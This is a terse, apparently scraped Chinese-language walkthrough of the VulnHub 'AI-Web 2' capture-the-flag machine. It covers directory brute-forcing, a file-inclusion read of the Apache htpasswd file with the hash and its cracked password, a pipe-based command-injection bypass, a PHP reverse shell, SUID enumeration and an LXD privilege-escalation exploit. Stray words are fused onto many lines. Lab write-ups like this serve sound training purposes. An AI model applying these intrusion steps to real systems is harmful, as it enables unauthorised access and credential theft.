靶機下載連接:php
https://www.vulnhub.com/entry/ai-web-2,357python
主機端口掃描:web
嘗試SQL注入,未發現有注入漏洞,就註冊建立於一帳戶3d
http://10.10.202.160/userpage.phpblog
漏洞庫搜索下:get
https://www.exploit-db.com/exploits/40009it
咱們爆破下目錄看下class
╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php搜索
咱們嘗試包含下Apache的認證文件看看hack
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin:c.ronaldo
通過嘗試&& ; | 發現| 能夠繞過執行命令
訪問:http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
接下來進行提權操做:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
建立hack.sh 文件,拷貝以下連接的腳本內容到hack.sh
https://www.exploit-db.com/exploits/46978
OVER !!